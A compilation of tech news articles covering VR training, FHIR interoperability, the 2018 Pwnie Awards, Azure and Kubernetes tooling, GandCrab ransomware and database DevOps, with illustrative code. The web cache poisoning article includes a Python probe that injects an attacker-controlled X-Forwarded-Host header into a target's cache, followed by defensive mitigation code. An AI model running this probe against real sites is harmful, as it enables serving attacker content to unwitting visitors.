At HR Technology Conference, Walmart says virtual reality works

LAS VEGAS — Learning technology appears to be heading for a major upgrade. Walmart is using virtual reality, or VR, to train its employees, and many other companies may soon do the same.

VR adoption is part of a larger tech shift in employee learning. For example, companies such as Wendy’s are using simulation or gamification to help employees learn about food preparation.

Deploying VR technology is expensive, with cost estimates ranging from tens of thousands of dollars to millions, attendees at the HR Technology Conference learned. But headset prices are declining rapidly, and libraries of VR training tools for dealing with common HR situations — such as how to fire an employee — may make this tool affordable to firms of all sizes.

For Walmart, a payoff of using virtual reality comes from higher job certification test scores. Meanwhile, Wendy’s has been using computer simulations to help employees learn their jobs. It is also adapting its training to the expectations of its workers, and its efforts have led to a reduction in employee turnover. Presentations and interviews at the HR Technology Conference suggest that users deploying these technologies are enthusiastic about them.

Walmart employees experience VR’s 3D

“It truly becomes an experience,” said Andy Trainor, senior director of Walmart Academies, in an interview about the impact of VR and augmented reality on training. It’s unlike a typical classroom lesson. “Employees actually feel like they experience it,” he said.

Walmart’s training and virtual reality team, from left to right: Brock McKeel, senior director of digital operations at Walmart, and Andy Trainor, senior director of Walmart Academies.

Walmart employees go to “academies” for training, testing and certification on certain processes, such as taking care of the store’s produce section, interacting with customers or preparing for Black Friday. As one person in a class wears the VR headset or goggles, what that person sees and experiences displays on a monitor for the class to follow.

Walmart has been using VR in training from startup STRIVR for just over a year. In classes using VR, Trainor said the company is seeing an increase in test scores as high as 15% over traditional methods of instruction. Trainor said his team members are convinced VR, with its ability to create 3D simulations, is here to stay as a training tool. 

“Life isn’t 2D,” said Brock McKeel, senior director of digital operations at Walmart. For problems ranging from customer service issues to emergency weather planning, “we want our associates to be the best prepared that we can get them to be.”

Walmart has also created a simulation-type game that helps employees understand store management. The company plans to soon release its simulation as an app for anyone to experience, Trainor said.

The old ways of training are broken

The need to do things differently in learning was a theme at the HR Technology Conference.

Life isn’t 2D.
Brock McKeel, senior director of digital operations at Walmart

Expecting employees to take time out of their day to watch a training video or read material that may not be connected to the task at hand is not effective, said David Mallon, a vice president and chief analyst at Bersin, Deloitte Consulting, based in Oakland, Calif.

The traditional methods of learning “have fallen apart,” Mallon said. Employees “want to engage with content on their terms, when they need it, where they need it and in ways that make more sense.”

Mallon’s point is something Wendy’s realized about its restaurant workers, who understand technology and have expectations about content, said Coley O’Brien, chief people officer at the restaurant chain. Employees want the content to be quick, they want the ability to swipe, and videos should be 30 seconds or less, he said.

“We really had to think about how we evolve our training approach and our content to really meet their expectations,” said O’Brien, who presented at the conference.

Wendy’s also created simulations that reproduce some of the time pressures employees face in certain food-preparation processes. Employees must make choices in the simulations, and mistakes are tracked. The company uses Cornerstone OnDemand’s platform.

Restaurants where employees have received a certain level of certification see sales increases of 1% to 2%, higher customer satisfaction and turnover reductions as high as 20%, O’Brien said.

Tech giants support FHIR standard. Will that make a difference?

During a White House meeting about the new Blue Button 2.0 API for Medicare, six major technology players signed a joint statement pledging to work toward healthcare interoperability with a particular focus on the cloud and artificial intelligence.

The companies — Amazon, Microsoft, Google, IBM, Oracle and Salesforce — promised to support the goal of “frictionless” interoperability using established industry standards, including the HL7 FHIR standard API. They offered a vision of a robust ongoing dialogue that would include every healthcare entity, from payers to patients and application developers, according to a statement released by the Information Technology Industry Council.

Pushing the FHIR standard forward

The statement comes at a time when patient demand for easy access to healthcare data has never been greater. Large hospitals have responded with nascent efforts to improve data exchange based on the FHIR standard API, but there is widespread acknowledgement that healthcare lags far behind other industries when it comes to tech innovation and particularly interoperability. The idea of what could effectively be a consortium of mainstream technology companies working on this tricky problem and promoting the FHIR standard was received warmly by some this week and with a healthy dose of skepticism by others.
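
For readers unfamiliar with it, FHIR exposes clinical data as discrete resources (Patient, Observation, Medication and so on) over an ordinary REST-and-JSON API, which is part of what makes it attractive to cloud and AI vendors. The snippet below is a minimal illustrative sketch of that convention in Python using the requests library; the base URL is a placeholder, not an endpoint from any of the companies named above.

```python
import requests

# Placeholder base URL for a FHIR R4 server; substitute a sandbox or vendor endpoint.
FHIR_BASE = "https://example.com/fhir/R4"
HEADERS = {"Accept": "application/fhir+json"}


def get_patient(patient_id):
    """Read a single resource: GET {base}/Patient/{id} returns a Patient as JSON."""
    resp = requests.get(f"{FHIR_BASE}/Patient/{patient_id}", headers=HEADERS, timeout=10)
    resp.raise_for_status()
    return resp.json()


def search_patients(family_name):
    """Search returns a Bundle; matching resources sit under entry[].resource."""
    resp = requests.get(
        f"{FHIR_BASE}/Patient",
        params={"family": family_name},
        headers=HEADERS,
        timeout=10,
    )
    resp.raise_for_status()
    return [entry["resource"] for entry in resp.json().get("entry", [])]


if __name__ == "__main__":
    for patient in search_patients("Smith"):
        print(patient["id"], patient.get("name"))
```

The interoperability the statement promises amounts to these same two calls working unchanged against any conformant server, whether it runs in a hospital data center or on one of the signatories’ clouds.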

The fact that the statement called out cloud usage specifically is telling, because, for reasons ranging from security to cost, a significant portion of healthcare organizations continue to avoid the cloud. A 2017 report from KLAS Research found 31% of hospitals either won’t expand their cloud efforts or won’t move to the cloud.

“The cloud really is a double-edged sword,” said Kathy Downing, vice president of information governance, informatics, standards, privacy and security at the American Health Information Management Association (AHIMA), in an interview. While the cloud might offer a more secure environment than some smaller health organizations could achieve, Downing isn’t convinced the cloud itself is pivotal to interoperability. “I don’t know that the cloud really has a dog in this interoperability hunt,” she said. “You want to think through the safeguards and do all the assessments. That’s more important than whether you’re using a server or the cloud.”

I’m not sure how any of these entities will solve the issue of semantic interoperability.
John Moore, founder and managing partner of Chilmark Research

It’s a positive sign for the healthcare industry that it’s attracted the attention of these major players, said Coray Tate, vice president of clinical research at KLAS, in an email. But the market has to be there for this to work. “We’re at the base of the mountain and early steps are the easiest,” he said. “It remains to be seen if the market will provide a business case that will sustain the long climb.”

And the business case may not be there, because this group of tech companies isn’t in most hospitals in any significant way today, said John Moore, founder and managing partner of Chilmark Research, in an email. “As big and influential as these companies are, their collective presence in healthcare is quite disparate, and at the end of the day it is what a clinician is using in their workflow that matters,” he explained. “These companies are simply not there. I’m not sure how any of these entities will solve the issue of semantic interoperability.” To further complicate matters, most hospitals don’t want to share patient data with competitors, he said. “They have instead opted to let patients themselves take direct responsibility.”

Tech support potentially a good thing

Attention from tech giants, however, should be seen as a good thing as long as everyone is thoughtful about how to proceed, said Stan Huff, M.D., chief medical informatics officer at Intermountain Healthcare and co-chair of the Health Level 7 (HL7) Clinical Information Modeling Initiative, which developed the FHIR standard API. “This is significant because it creates faith in HL7 FHIR and will encourage investment in FHIR development,” he said. “The thing I would want to encourage is that this group work with existing organizations like HL7, ONC, HSPC and CIIC to ensure they all implement the FHIR standard the same way so we get to true semantic interoperability at some point.”

The joint statement offered few details on future plans but stressed the need to get everyone involved, including the open source community. “I think we will need to wait a few weeks to hear specific projects to know what additional impact they will have,” Huff said.

2018 Pwnie Awards cast light and shade on infosec winners

The Meltdown and Spectre side-channel attacks that exploit weaknesses in major processors scored the top spot in two of three Pwnie Award categories — Best Privilege Escalation Bug and Most Innovative Research — but missed on the prize for the most overhyped vulnerability.

The Pwnie Awards, a longtime staple of the Black Hat security conference, are often compared to the Academy Awards, but with spray-painted pony statues, fewer movie stars and more questionable prizes for things like Lamest Vendor Response and Most Overhyped Bug.

This year, the Pwnie Award for Most Innovative Research went to the researchers who discovered the Meltdown and Spectre design flaws. That prize goes to “the most interesting and innovative research in the form of a paper, presentation, tool or even a mailing list post,” according to the Pwnie Awards website. The Pwnie Awards website described Meltdown and Spectre in its nomination for most overhyped bug:

Meltdown and Spectre were vulnerabilities in the way branch prediction worked which would allow attackers the ability to read memory. It was pretty awesome and affected most systems. But at some point, they [sic] hype train jumped the tracks a bit. The normally extremely accurate Fox News called it the worst computer bug in history. One of the researchers who discovered it agreed, calling it ‘probably one of the worst CPU bugs ever found.’ Bloomberg agreed, the Verge said it was a catastrophe.

Meltdown and Spectre also got the Pwnie Award for Best Privilege Escalation Bug — a nod toward the seriousness of the flaws, given how unusual it is for a research team to win in more than one category.

Also worthy of honor

Other Pwnie Awards honored more of the best of security research from the past year, including the following:

  • The Pwnie for Best Server-Side Bug went to the Intel Active Management Technology remote vulnerability, a flaw that enabled an exploit that could bypass endpoint protections, including the Windows firewall.
  • The Pwnie for Best Client-Side Bug went to researchers Georgi Geshev and Rob Miller, who built an exploit chain against Android that used 11 bugs in six different applications and was referred to by the Pwnie Awards as “The 12 Logic Bug Gifts of Christmas.”
  • Pwnie for Best Cryptographic Attack went to researchers Hanno Böck, Juraj Somorovsky and Craig Young for their work on the Return Of Bleichenbacher’s Oracle Threat, also known as the ROBOT attack.

The Pwnie Awards initially solicited nominations in 16 categories, but awarded prizes only in the eight categories that received the most nominations, including a Lifetime Achievement Award given to Michal Zalewski, also known as lcamtuf, former director of information security engineering at Google and author of the classic hacker field guide, Silence on the Wire.

Lamest Vendor Response and Most Overhyped Bug

Some of the stiffest competition may have been for the booby prizes.

The competition for overhyped bugs has been fierce recently, as contenders continue to commission websites, logos and social media handles for bugs that might be less than compelling. The nominees for this Pwnie Award honor this year included the Meltdown and Spectre vulnerabilities in microprocessors reported in January, as well as the apparent EFAIL vulnerability in end-to-end encryption technology that turned out to be an issue in email clients.

The winner was a not-quite-tongue-in-cheek parody, Holey Beep, complete with website, logo and tracking assignment as CVE-2018-0492. Beep, a Unix command, “does what you’d expect: it beeps,” according to the description from the Holey Beep website. “Beep allows you to control pitch, duration, and repetitions” of the tone.

But it also can give an attacker root on the target system. “Its job is to live inside shell/perl scripts and allow more granularity than one has otherwise. It is controlled completely through command line options. It’s not supposed to be complex, and it isn’t — but it makes system monitoring (or whatever else it gets hacked into) much more informative. Also it gives you root.”

Meanwhile, Bitfi, maker of the Bitfi Wallet, was the late-entry surprise winner of the Pwnie Award for Lamest Vendor Response. Although the Bitfi situation played out just days before Black Hat, The Register reported it received thousands of nominations after hackers comprehensively cracked the devices and demonstrated numerous security failures in the design. Bitfi backed off its offer of a six-figure bounty to any hacker who could manage to hack it by standing behind a very narrow definition of what constituted a hack — namely, pulling the private key off of a device that doesn’t store the key.

The well-documented hacks came after Bitfi’s executive chairman, John McAfee, extolled the device as “the world’s first unhackable storage for cryptocurrency and digital assets.”

Web cache poisoning attacks demonstrated on major websites, platforms

Major websites and platforms may be vulnerable to simple yet devastating web cache poisoning attacks, which could put millions of users in jeopardy.

James Kettle, head of research at PortSwigger Web Security, Ltd., a cybersecurity tool publisher headquartered near Manchester, U.K., demonstrated several such attacks during his Black Hat 2018 session titled “Practical Web Cache Poisoning: Redefining ‘Unexploitable.'” Kettle first unveiled his web cache poisoning hacks in May, but in the Black Hat session he detailed his techniques and showed how major weaknesses in HTTPS response headers allowed him to compromise popular websites and manipulate platforms such as Drupal and Mozilla’s Firefox browser.

“Web cache poisoning is about using caches to save malicious payloads so those payloads get served up to other users,” he said. “Practical web cache poisoning is not theoretical. Every example I use in this entire presentation is based on a real system that I’ve proven can be exploited using this technique.”

As an example, Kettle showed how he was able to use a simple technique to compromise the home page of Linux distributor Red Hat. He created an open source extension for PortSwigger’s Burp Suite Scanner called Param Miner, which detected unkeyed inputs in the home page. From there, Kettle was able to change the X-Forwarded-Host header and load a cross-site scripting payload into the site’s cache, so that the cached response delivered the malicious payload to whoever visited the site. “We just got full control over the home page of RedHat.com, and it wasn’t very difficult,” he said.
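
To make the mechanics concrete, here is a rough sketch of that kind of probe in Python with the requests library. The target URL, cache-buster parameter and attacker domain are hypothetical, and this is not Kettle’s actual tooling; it only illustrates how an unkeyed header such as X-Forwarded-Host can be reflected into a response that the cache then serves to every visitor.

```python
import requests

# Hypothetical target and attacker domain; only probe systems you are authorized to test.
TARGET = "https://shop.example.com/?cb=poison-test-1"  # cache buster isolates the experiment
EVIL_HOST = "attacker.example"

# 1. Send a request carrying a poisoned X-Forwarded-Host header. If the application
#    builds absolute URLs (script sources, canonical links) from this header and the
#    cache does not include the header in its cache key, the reflection gets stored.
requests.get(TARGET, headers={"X-Forwarded-Host": EVIL_HOST}, timeout=10)

# 2. Request the same URL as an ordinary visitor, with no special header.
victim_view = requests.get(TARGET, timeout=10)

# 3. If the attacker-controlled host appears in the plain response, the cache is now
#    serving the poisoned copy -- any script URL it contains points at EVIL_HOST.
if EVIL_HOST in victim_view.text:
    print("Unkeyed X-Forwarded-Host reflected from the cache; poisoning is possible")
else:
    print("No cached reflection observed for this input")
```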

In another test case, Kettle used web cache poisoning on the infrastructure for Mozilla’s Firefox Shield, which Mozilla uses to push application and plug-in updates to users. When the Firefox browser initially loads, it contacts Shield for updates and other information such as “recipes” for installing extensions. During a different test case on a Data.gov site, he found an “origin: null” header from Mozilla and discovered he could manipulate the “X-Forwarded-Host” header to trick the system, so that instead of going to Firefox Shield to fetch recipes, Firefox would be directed to a domain Kettle controlled.

Kettle found that Mozilla signed the recipes, so he couldn’t simply make a malicious extension and install it on 50 million computers. But he discovered he could replay old recipes, specifically one for an extension with a known vulnerability; he could then compromise that extension and forcibly inflict that vulnerable extension on every Firefox browser in the world.

“The end effect was I could make every Firefox browser on the planet connect to my system to fetch this recipe, which specified what extensions to install,” he said. “So that’s pretty cool because that’s 50 million browsers or something like that.”

Kettle noted in his research that when he informed Mozilla of the technique, they patched it within 24 hours; but, he wrote, “there was some disagreement about the severity so it was only rewarded with a $1,000 bounty.”

Kettle also demonstrated techniques that allowed him to compromise GoodHire.com, blog.Cloudflare.com and several sites that use Drupal’s content management platform. While the web cache poisoning attacks he demonstrated were potentially devastating, Kettle said they could be mitigated with a few simple steps. First, he said, organizations should “cache with caution” and if possible, disable it completely.

However, Kettle acknowledged that may not be realistic for larger enterprises, so in those cases he recommended diligently scanning for unkeyed inputs. “Avoid taking input from HTTP headers and cookies as much as possible,” he said, “and also audit your applications with Param Miner to see if you can find any unkeyed inputs that your framework has snuck in support for.”
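
A sketch of what that advice can look like in application code follows, using a minimal Flask handler of my own construction (Kettle does not prescribe a framework): links are built from a configured canonical host rather than from forwarding headers, and if a header legitimately must influence a cacheable response, it is declared in Vary so caches key on it.

```python
from flask import Flask, make_response

app = Flask(__name__)

# Hypothetical canonical hostname, taken from configuration rather than request headers.
CANONICAL_HOST = "www.example.com"


@app.route("/")
def index():
    # Build absolute URLs from configuration, not from X-Forwarded-Host or similar headers.
    body = f'<a href="https://{CANONICAL_HOST}/login">Log in</a>'
    resp = make_response(body)
    resp.headers["Cache-Control"] = "public, max-age=60"
    # If a request header truly must change a cached response, list it here so shared
    # caches treat each header value as a separate cache entry.
    resp.headers["Vary"] = "Accept-Encoding"
    return resp


if __name__ == "__main__":
    app.run()
```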

Microsoft Azure Dev Spaces, Google Jib target Kubernetes woes

To entice developers to create more apps on their environments, major cloud platform companies will meet them where they live.

Microsoft and Google both released tools to help ease app development on their respective platforms, Microsoft Azure and Google Cloud Platform. Microsoft’s Azure Dev Spaces and Google’s Jib help developers build applications for the Kubernetes container orchestrator and Java environments, respectively, and represent a means to deliver simpler, developer-friendly technology.

Microsoft’s Azure Dev Spaces, now in public preview, is a cloud-native development environment for the company’s Azure Kubernetes Service (AKS), where developers can work on applications while connected with the cloud and their team. These users can build cloud applications with containers and microservices on AKS and do not deal with any infrastructure management or orchestration, according to Microsoft.

As Kubernetes further commoditizes deployment and orchestration, cloud platform vendors and public cloud providers must focus on how to simplify customers’ implementation of cloud-native development methods — namely DevOps, CI/CD and microservices, said Rhett Dillingham, an analyst at Moor Insights & Strategy in Austin, Texas.

“Azure Dev Spaces has the potential to be one of Microsoft’s most valuable recent developer tooling innovations, because it addresses the complexity of integration testing and debugging in microservices environments,” he said.

With the correct supporting services, developers can fully test and deploy in Microsoft Azure, added Edwin Yuen, an analyst at Enterprise Strategy Group in Milford, Mass.

“This would benefit the developer, as it eases the process of container development by allowing them to see the results of their app without having to set up a Docker or Kubernetes environment,” he said.

Meanwhile, Google’s Jib containerizer tool enables developers to package a Java application into a container image with the Java tools they already know, and to use it to create advanced container-based applications. And like Azure Dev Spaces, it handles a lot of the underlying infrastructure and orchestration tasks.

It’s about simplifying the experience … the developer is eased into the process by using existing tools and eliminating the need to set up Docker or Kubernetes.
Edwin Yuen, analyst, Enterprise Strategy Group

Integration with Java development tools Maven and Gradle means Java developers can skip the step to create JAR, or Java ARchive, files and then containerize them, Yuen said.

“Like Azure Dev Spaces, it’s about simplifying the experience — this time, not the laptop jump, but the jump from JAR to container,” he said. “But, again, the developer is eased into the process by using existing tools and eliminating the need to set up Docker or Kubernetes.”

Jib also extends Google’s association with the open source community to provide Java developers an easy path to containerize their apps while using the Google Cloud Platform, Yuen added.

Microsoft bills Azure network as the hub for remote offices

Microsoft’s foray into the rapidly growing SD-WAN market could solve a major customer hurdle and open Azure to even more workloads.

All the major public cloud platforms have increased their networking functionality in recent months, and Microsoft’s latest service, Azure Virtual WAN, pushes the boundaries of those capabilities. The software-defined network acts as a hub that links with third-party tools to improve application performance and reduce latency for companies with multiple offices that access Azure.

IDC estimates the software-defined wide area network (SD-WAN) market will hit $8 billion by 2021, as cloud computing continues to proliferate and employees must access cloud-hosted workloads from various locations. So far, the major cloud providers have left that work to partners.

But this Azure network service solves a big problem for customers that make decisions about network transports and integration with existing routers, as they consume more cloud resources from more locations, said Brad Casemore, an IDC analyst.

“Now what you’ve got is more policy-based, tighter integration within the SD-WAN,” he said.

Azure Virtual WAN uses a distributed model to link Microsoft’s global network with traditional on-premises routers and SD-WAN systems provided by Citrix and Riverbed. Microsoft’s decision to rely on partners, rather than provide its own gateway services inside customers’ offices, suggests it doesn’t plan to compete across the totality of the SD-WAN market, but rather provide an on-ramp to integrate with third-party products.

Customers can already use various SD-WAN providers to easily link to a public cloud, but Microsoft has taken the level of integration a step further, said Bob Laliberte, an analyst at Enterprise Strategy Group in Milford, Mass. Most SD-WAN vendors are building out security ecosystems, but Microsoft already has that in Azure, for example.

This could also simplify the purchasing process, and it would make sense for Microsoft to eventually integrate this virtual WAN with Azure Stack to help facilitate hybrid deployments, Laliberte said.

The Azure Virtual WAN service is billed as a way to connect remote offices to the cloud, and also to each other, with improved reliability and availability of applications. But that interoffice linkage also could lure more companies to use Azure for a whole host of other services, particularly customers just starting to embrace the public cloud.

There are still questions about the Azure network service, particularly around multi-cloud deployments. It’s unclear if customers trust Microsoft — or any single hyperscale cloud vendor — at the core of their SD-WAN implementation, as their architectures spread across multiple clouds, Casemore said.

Azure updates boost network security, data analytics tools

Microsoft also introduced an Azure network security feature this week, Azure Firewall, with which users can create and enforce network policies across multiple endpoints. The stateful firewall protects Azure Virtual Network resources and maintains high availability without any restrictions on scale.

Several other updates include an expanded Azure Data Box service, still in preview, which provides customers with an appliance onto which they can upload data and ship directly to an Azure data center. These types of devices have become a popular means to speed massive migrations to public clouds. Another option for Azure users, Azure Data Box Disk, uses SSD disks to transfer up to 40 TB of data spread across five drives. That’s smaller than the original box’s 100 TB capacity, and better suited to collect data from multiple branches or offices, the company said.

Microsoft also doubled the query performance of Azure SQL Data Warehouse to support up to 128 concurrent queries, and waived the transfer fee for migrations to Azure of legacy applications that run on Windows Server and SQL Server 2008/2008 R2, for which Microsoft will end support in July 2019. Microsoft also plans to add features to Power BI for data ingestion and integration across BI models, similar to what customers already experience with Power Query for Excel.

GandCrab ransomware adds NSA tools for faster spreading

With version 4, GandCrab ransomware has undergone a major overhaul, adding an NSA exploit to help it spread and targeting a larger set of systems.

The updated GandCrab ransomware was first discovered earlier this month, but researchers are just now learning the extent of the changes. The code structure of the GandCrab ransomware was completely rewritten. And, according to Kevin Beaumont, a security architect based in the U.K., the malware now uses the EternalBlue National Security Agency (NSA) exploit to target SMB vulnerabilities and spread faster.

“It no longer needs a C2 server (it can operate in airgapped environments, for example) and it now spreads via an SMB exploit – including on XP and Windows Server 2003 (along with modern operating systems),” Beaumont wrote in a blog post. “As far as I’m aware, this is the first ransomware true worm which spreads to XP and 2003 – you may remember much press coverage and speculation about WannaCry and XP, but the reality was the NSA SMB exploit (EternalBlue.exe) never worked against XP targets out of the box.”

Joie Salvio, senior threat researcher at Fortinet, based in Sunnyvale, Calif., found the GandCrab ransomware was being spread to targets via spam email and malicious WordPress sites and noted another major change to the code.

“The biggest change, however, is the switch from using RSA-2048 to the much faster Salsa20 stream cipher to encrypt data, which had also been used by the Petya ransomware in the past,” Salvio wrote in the analysis. “Furthermore, it has done away with connecting to its C2 server before it can encrypt its victims’ file, which means it is now able to encrypt users that are not connected to the Internet.”

However, the GandCrab ransomware appears to specifically target users in Russian-speaking regions. Fortinet found the malware checks the system for use of the Russian keyboard layout before it continues with the infection.

Despite the overhaul of the GandCrab ransomware and the expanded systems being targeted, Beaumont and Salvio both said basic cyber hygiene should be enough to protect users from attack. This includes installing the EternalBlue patch released by Microsoft, keeping antivirus up-to-date and disabling SMB version 1 altogether, which is advice that has been repeated by various outlets, including US-CERT, since the initial WannaCry attacks began.

Database DevOps tools bring stateful apps up to modern speed

DevOps shops can say goodbye to a major roadblock in rapid application development.

At this time in 2017, cultural backlash from database administrators (DBAs) and a lack of mature database DevOps tools made stateful applications a hindrance to the rapid, iterative changes made by Agile enterprise developers. But, now, enterprises have found both application and infrastructure tools that align databases with fast-moving DevOps pipelines.

“When the marketing department would make strategy changes, our databases couldn’t keep up,” said Matthew Haigh, data architect for U.K.-based babywear retailer Mamas & Papas. “If we got a marketing initiative Thursday evening, on Monday morning, they’d want to know the results. And we struggled to make changes that fast.”

Haigh’s team, which manages a Microsoft Power BI data warehouse for the company, has realigned itself around database DevOps tools from Redgate since 2017. The DBA team now refers to itself as the “DataOps” team, and it uses Microsoft’s Visual Studio Team Services to make as many as 15 to 20 daily changes to the retailer’s data warehouse during business hours.

Redgate’s SQL Monitor was the catalyst to improve collaboration between the company’s developers and DBAs. Haigh gave developers access to the monitoring tool interface and alerts through a Slack channel, so they could immediately see the effect of application changes on the data warehouse. They also use Redgate’s SQL Clone tool to spin up test databases themselves, as needed.

“There’s a major question when you’re starting DevOps: Do you try to change the culture first, or put tools in and hope change happens?” Haigh said. “In our case, the tools have prompted cultural change — not just for our DataOps team and dev teams, but also IT support.”

Database DevOps tools sync schemas

Redgate’s SQL Toolbelt suite is one of several tools enterprises can use to make rapid changes to database schemas while preserving data integrity. Redgate focuses on Microsoft SQL Server, while other vendors, such as Datical and DBmaestro, support a variety of databases, such as Oracle and MySQL. All of these tools track changes to database schemas from application updates and apply those changes more rapidly than traditional database management tools. They also integrate with CI/CD pipelines for automated database updates.
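
Vendors differ in syntax and database coverage, but the shared mechanism is an ordered log of schema changes plus a tracking table in the target database that records which changes have already been applied, so the same pipeline can run safely against dev, test and production. The sketch below is a toy stand-in for that idea using Python’s standard sqlite3 module; it is not how Redgate, Datical or DBmaestro actually implement it.

```python
import sqlite3

# Ordered schema changes with stable IDs. In a real tool these live in
# version-controlled changelog files, not inline strings.
MIGRATIONS = [
    ("001_create_orders", "CREATE TABLE orders (id INTEGER PRIMARY KEY, total REAL)"),
    ("002_add_customer", "ALTER TABLE orders ADD COLUMN customer_id INTEGER"),
]


def migrate(conn):
    """Apply every migration not yet recorded in the schema_version tracking table."""
    conn.execute(
        "CREATE TABLE IF NOT EXISTS schema_version (id TEXT PRIMARY KEY, applied_at TEXT)"
    )
    applied = {row[0] for row in conn.execute("SELECT id FROM schema_version")}
    for migration_id, ddl in MIGRATIONS:
        if migration_id in applied:
            continue  # already deployed on this database; reruns are safe
        conn.execute(ddl)
        conn.execute(
            "INSERT INTO schema_version (id, applied_at) VALUES (?, datetime('now'))",
            (migration_id,),
        )
        conn.commit()
        print(f"applied {migration_id}")


if __name__ == "__main__":
    # A CI/CD stage would run this against each environment in turn.
    migrate(sqlite3.connect("app.db"))
```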

Radial Inc., an e-commerce company based in King of Prussia, Pa., and spun out of eBay in 2016, took a little more than two years to establish database DevOps processes with tools from Datical. In that time, the company has trimmed its app development processes that involve Oracle, SQL Server, MySQL and Sybase databases from days down to two or three hours.

“Our legacy apps, at one point, were deployed every two to three months, but we now have 30 to 40 microservices deployed in two-week sprints,” said Devon Siegfried, database architect for Radial. “Each of our microservices has a single purpose and its own data store with its own schema.”

That means Radial, a 7,000-employee multinational company, manages about 300 Oracle databases and about 130 instances of SQL Server. The largest database change log it’s processed through Datical’s tool involved more than 1,300 discrete changes.

“We liked Datical’s support for managing at the discrete-change level and forecasting the impact of changes before deployment,” Siegfried said. “It also has a good rules engine to enforce security and compliance standards.”

Datical’s tool is integrated with the company’s GoCD DevOps pipeline, but DBAs still manually kick off changes to databases in production. Siegfried said he hopes that will change in the next two months, when an update to Datical will allow it to detect finer-grained attributes of objects from legacy databases.

ING Bank Turkey looks to Datical competitor DBmaestro to link .NET developers who check in changes through Microsoft’s Team Foundation Server 2018 to its 20 TB Oracle core banking database. Before its DBmaestro rollout in November 2017, those developers manually tracked schema and script changes through the development and test stages and ensured the right ones deployed to production. DBmaestro now handles those tasks automatically.

“Developers no longer have to create deployment scripts or understand changes preproduction, which was not a safe practice and required more effort,” said Onder Altinkurt, IT product manager for ING Bank Turkey, based in Istanbul. “Now, we’re able to make database changes roughly weekly, with 60 developers in 15 teams and 70 application development pipelines.”

Database DevOps tools abstract away infrastructure headaches

Keeping database schemas and deployment scripts consistent through rapid application changes is an important part of DevOps practices with stateful applications, but there’s another side to that coin: infrastructure provisioning.

Stateful application management through containers and container orchestration tools such as Kubernetes is still in its early stages, but persistent container storage tools from Portworx Inc. and data management tools from Delphix have begun to help ease this burden, as well.

GE Digital put Portworx container storage into production to support its Predix platform in 2017, and GE Ventures later invested in the company.

Now, [developers] make database changes roughly weekly, with 60 developers in 15 teams and 70 application development pipelines.
Onder Altinkurt, IT product manager, ING Bank Turkey

“Previously, we had a DevOps process outlined. But if it ended at making a call to GE IT for a VM and storage provisioning, you give up the progress you made in reducing time to market,” said Abhishek Shukla, managing director at GE Ventures, based in Menlo Park, Calif. “Our DevOps engineering team also didn’t have enough time to call people in IT and do the infrastructure testing — all that had to go on in parallel with application development.”

Portworx allows developers to describe storage requirements such as capacity in code, and then triggers the provisioning at the infrastructure layer through container orchestration tools, such as Mesosphere and Kubernetes. The developer doesn’t have to open a ticket, wait for a storage administrator or understand the physical infrastructure. Portworx can arbitrate and facilitate data management between multiple container clusters, or between VMs and containers. As applications change and state is torn down, there is no clutter to clean up afterward, and Portworx can create snapshots and clone databases quickly for realistic test data sets.
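
As a rough illustration of describing storage requirements in code, the sketch below uses the official Kubernetes Python client to request a 20 GiB volume through a PersistentVolumeClaim. The storage class name is a placeholder, and Portworx’s own CLI and custom resources expose far more (replication, snapshots, cloning) than this minimal example shows.

```python
from kubernetes import client, config


def request_volume(name, size_gi, storage_class="portworx-sc"):
    """Declare the storage a workload needs; the storage layer behind the named
    class (Portworx, in the article's example) provisions it on demand."""
    config.load_kube_config()  # use load_incluster_config() when running inside a pod
    pvc = {
        "apiVersion": "v1",
        "kind": "PersistentVolumeClaim",
        "metadata": {"name": name},
        "spec": {
            "accessModes": ["ReadWriteOnce"],
            "storageClassName": storage_class,  # placeholder class name
            "resources": {"requests": {"storage": f"{size_gi}Gi"}},
        },
    }
    client.CoreV1Api().create_namespaced_persistent_volume_claim(
        namespace="default", body=pvc
    )


if __name__ == "__main__":
    request_volume("test-db-data", 20)
```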

Portworx doesn’t necessarily offer the same high-octane performance for databases as bare-metal servers, said a Portworx partner, Kris Watson, co-founder of ComputeStacks, which packages Portworx storage into its Docker-based container orchestration software for service-provider clients.

“You may take a minimal performance hit with software abstraction layers, but rapid iteration and reproducible copies of data are much more important these days than bare-metal performance,” Watson said.

Adding software-based orchestration to database testing processes can drastically speed up app development, as Choice Hotels International discovered when it rolled out Delphix’s test data management software a little more than two years ago.

“Before that, we had never refreshed our test databases. And in the first year with Delphix, we refreshed them four or five times,” said Nick Suwyn, IT leader at the company, based in Rockville, Md. “That has cut down data-related errors in code and allowed for faster testing, because we can spin up a test environment in minutes versus taking all weekend.”

The company hasn’t introduced Delphix to all of its development teams, as it prioritizes a project to rewrite the company’s core reservation system on AWS. But most of the company’s developers have access to self-service test databases whenever they are needed, and Suwyn’s team will link Delphix test databases with the company’s Jenkins CI/CD pipelines, so developers can spin up test databases automatically through the Jenkins interface.

Airtel CIO targets cutting-edge tech

A major part of every digital transformation is exploring how cutting-edge tech can facilitate the journey. Some companies, like Indian telecom giant Bharti Airtel Ltd., are more capable than others of experimenting with new technologies, affording them a wealth of opportunities for innovation.

In this video from the recent MIT Sloan CIO Symposium, Harmeen Mehta, global CIO and head of digital at Airtel, discusses some of the cutting-edge tech she’s employing at her company — everything from advanced mapping techniques and network digitization to voice computing technology and AI-driven customer offerings.

Editor’s note: This transcript has been edited for clarity and length.

What kind of cutting-edge tech are you using to speed up your company’s digital transformation process?

Harmeen Mehta: Lots of pieces. I think one of the biggest challenges that we have is mapping the intricacies and the inner lanes in India and doing far more than what even Google does. For Google, the streets are of prime importance [when it comes to mapping]. For us, the address of every single house and whether it’s a high-rise building or it’s a flat is very important as we bring different services into these homes. So, we’ve been working on finding very innovative ways to take Google’s [mapping] as a base and make it better for us to be able to map India to that level of accuracy of addresses, houses and floor plans.

Another problem that I can think of where a lot of cutting-edge tech is being used is in creating a very customized contextual experience for the consumer so that every consumer has a unique experience on any of our digital properties. The kind of offers that the company brings to them are really tailored and suited to them rather than it being a general, mass offering. There’s a lot of machine learning and artificial intelligence that’s going into that.

Another one is we’re digitizing a large part of our network. In fact, we’re collaborating with SK Telecom, who we think is one of the most innovative telcos out there, in order to do that. We’re using, again, a lot of machine learning and artificial intelligence there as well, as we bring about an entire digitization of our network and are able to optimize the networks and our investments much better.

